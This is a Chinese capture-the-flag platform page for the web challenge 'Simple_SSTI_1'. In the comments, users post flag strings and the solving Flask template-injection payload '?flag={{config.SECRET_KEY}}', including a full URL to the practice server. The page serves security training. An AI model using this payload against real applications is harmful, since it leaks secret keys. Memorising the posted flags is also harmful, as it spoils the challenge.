Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28469
提  示:
描  述:
Simple_SSTI_1
评论
冷夜闻风 2年前

flag{e0ad0234936fcd15f11c7bb0f9d587e7}

回复 0

啵咯啵咯 2年前

在网址后面加上: /?flag={{config.SECRET_KEY}}

回复 3
Ysamer 2年前

这是什么原理

回复 0

大哥大 2年前

為什麼

回复 4

鸡你太美 2年前

flag{96df90d0f913f6e960b78dfb42e23bce}

回复 0

鸡你太美 2年前

传入一个变量?flag={{config}}

回复 0

19572987849 2年前

SECRET_KEY

回复 0

ctfjingsai 2年前

flag{32b9d809b374a1916bc2aca5af1d2e11}

回复 0

wuweiw 2年前

http://114.67.175.224:19724/?flag={{%20config.SECRET_KEY}}

回复 0

wukong20618 2年前

flask的模板注入:(注意:这里的SECRET_KEY需要大写)

回复 0

xc1919 2年前

flag{32b9d809b374a1916bc2aca5af1d2e11}

回复 0

chaoge 2年前

flag{8d156fd2764b7bc8429fb07d47be66e8}

回复 0

WriteUp

image
valecalida

5 金币

评分(50)

解题动态

easier 攻破了该题 9小时前
xuan2025 攻破了该题 3天前
aboic 攻破了该题 3天前
yttitan 攻破了该题 3天前
xiaomiao123 攻破了该题 3天前
liang123456 攻破了该题 4天前
xshzgjshpy 攻破了该题 4天前
yiwuxiaobawang 攻破了该题 4天前
MZH123456 攻破了该题 5天前
chengluo 攻破了该题 5天前
ez_not_easy 攻破了该题 6天前
zouwu 攻破了该题 6天前
0854永不言败 攻破了该题 7天前
bhcxzhdsa 攻破了该题 7天前
wwwwjjj 攻破了该题 8天前
gongyy 攻破了该题 8天前
123456lulu 攻破了该题 8天前
白菜白又白 攻破了该题 9天前
3381328748 攻破了该题 10天前
66666ctfxr 攻破了该题 10天前
问题反馈